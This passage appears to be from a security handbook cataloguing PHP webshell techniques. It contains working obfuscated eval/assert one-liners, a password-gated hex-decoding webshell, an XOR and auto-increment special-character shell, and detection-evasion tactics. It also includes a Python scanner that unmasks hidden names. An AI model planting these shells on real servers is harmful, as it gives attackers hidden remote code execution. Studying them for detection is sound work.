5.1.8. WebShell
5.1.8.1. Common variants
- GLOBALS
  - eval($GLOBALS['_POST']['op']);
- $_FILE
  - eval($_FILE['name']);
- Splitting
  - eval(${"_PO"."ST"} ['sz']);
- Dynamic function execution
  - $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
  - $a=$_GET['a'];$a($_GET['b']);
- create_function
  - $function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();
- preg_replace
- String transformation
  - str_replace(" ", "", "e v a l")
- Base conversion (hex and octal escapes)
  - "\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"
- Bitwise operation
  - ("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
- Auto-increment operation
  - $a="a";$a++;
- Type coercion
  - $a='';$a.=[]; // Array
- Using the file name
  - __FILE__
- Comments
  - $a="e"."v"./*-/*-*/"a"./*-*/"l";
- Reflection
  - ReflectionFunction
5.1.8.2. Bypass
- Based on rarely used functions
  - mb_eregi_replace('.*',$_GET[1],'','e');
  - set_error_handler + trigger_error
- Based on pollution
  - putenv($_GET["c"]);eval(getenv('path'));
  - parse_str
  - parse_url
  - extract
  - token_get_all
  - define
- Based on rarely used sources
  - $a = filter_input(INPUT_GET,'c');
  - eval(end(getallheaders()));
  - get_defined_vars
  - getallheaders
  - get_meta_tags
  - phpinfo
  - External variable/file information
  - Overload toString
5.1.8.3. String morphing functions
- base64_decode
- base64_encode
- str_replace
- str_rot13
- strtok
- strtolower
- strtoupper
- strtr
- substr
- substr_replace
- trim
- ucfirst
- ucwords
5.1.8.4. Callback functions
- array_filter
- array_map
- array_reduce
- array_walk
- array_walk_recursive
- call_user_func
- call_user_func_array
- filter_var
- filter_var_array
- preg_replace_callback
- register_tick_function
- register_shutdown_function
- uasort
- uksort
5.1.8.5. Encryption and decryption functions
- mcrypt_encrypt
- openssl_encrypt
5.1.8.6. Other implementation methods
- FFI
- SimpleXML
- SimpleXMLElement
5.1.8.7. Custom Functions
Custom encoding and decoding functions can, to a certain extent, bypass detection and removal by some protection software. The following code is a simple example that executes hexadecimal-encoded input.
$string = '';
$password = 'password';
if(isset($_POST[$password])){
    $hex = $_POST[$password];
    // Decode the hex string two characters at a time
    for($i = 0; $i < strlen($hex) - 1; $i += 2) {
        $string .= chr(hexdec($hex[$i] . $hex[$i + 1]));
    }
}
// Execute the decoded string
eval($string);
5.1.8.8. Special Character Shell
PHP can apply XOR and auto-increment operations directly to strings, so a shell can be built from special characters alone.
<?=`{${~"\xa0\xb8\xba\xab"}[~"\xa0"]}`;

@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
@${$__}[!$_](${$__}[$_]);

$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___(base64_decode($_[_]));
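
The splitting, comment, hex/octal escape, strrev, XOR and bitwise-NOT forms shown in 5.1.8.1 and in this section hide a name from signature matching until the expression is evaluated, so a scanner can fold constant string expressions first and match afterwards. The following Python scanner helper is an added example, not code from the original page; `hidden_names`, the `SENSITIVE` list and the folding rules are assumptions of this example, and the auto-increment form is not handled.

```python
import re

# Names worth flagging once reassembled (all taken from this page's samples).
SENSITIVE = ("eval", "assert", "base64_decode", "create_function", "_GET", "_POST")
LIT = r'"((?:\\x[0-9a-f]{2})*)"'   # canonical literal: every byte written as \xHH
PHP_STR = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

def _enc(data):
    return '"' + "".join(f"\\x{b:02x}" for b in data) + '"'

def _dec(body):
    return bytes.fromhex(body.replace("\\x", ""))

def _canon(m):
    """Rewrite one PHP string literal in canonical form, decoding hex/octal escapes."""
    if m.group(1) is None:                      # single-quoted: no escape decoding
        return _enc(m.group(2).encode("latin-1", "replace"))
    text = ESCAPE.sub(lambda e: chr(int(e.group(1), 16) if e.group(1)
                                    else int(e.group(2), 8) & 0xFF), m.group(1))
    return _enc(text.encode("latin-1", "replace"))

# Constant-folding rules, applied in this order until the source stops changing.
RULES = [
    (re.compile(r'~\s*' + LIT),                                  # ~"..."
     lambda m: _enc(bytes(b ^ 0xFF for b in _dec(m.group(1))))),
    (re.compile(r'\(\s*' + LIT + r'\s*\^\s*' + LIT + r'\s*\)'),  # ("a" ^ "b")
     lambda m: _enc(bytes(a ^ b for a, b in zip(_dec(m.group(1)), _dec(m.group(2)))))),
    (re.compile(r'strrev\(\s*' + LIT + r'\s*\)'),                # strrev("...")
     lambda m: _enc(_dec(m.group(1))[::-1])),
    (re.compile(LIT + r'\s*\.\s*' + LIT),                        # "a" . "b"
     lambda m: _enc(_dec(m.group(1)) + _dec(m.group(2)))),
]

def hidden_names(php):
    """Return sensitive names that appear only after folding string expressions."""
    src = re.sub(r'/\*.*?\*/', '', php, flags=re.S)   # comments can split a name
    src = PHP_STR.sub(_canon, src)
    prev = None
    while prev != src:
        prev = src
        for rx, fold in RULES:
            src = rx.sub(fold, src)
    folded = " ".join(_dec(b).decode("latin-1") for b in re.findall(LIT, src)).lower()
    return sorted(n for n in SENSITIVE if n.lower() in folded and n.lower() not in php.lower())

if __name__ == "__main__":   # input: the comment-splitting form quoted from this page
    print(hidden_names('$a="e"."v"./*-/*-*/"a"./*-*/"l";'))
```

A name is reported only when it is absent from the raw source, so a hit means the file assembles that name at run time instead of writing it out.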
5.1.8.9. Detection evasion
- Hindering program analysis through obfuscation
- Affecting program execution through dynamic variables
- Interrupting data flow analysis by throwing exceptions
- Interrupting data flow analysis through reflection
- Interrupting data flow analysis through passing by reference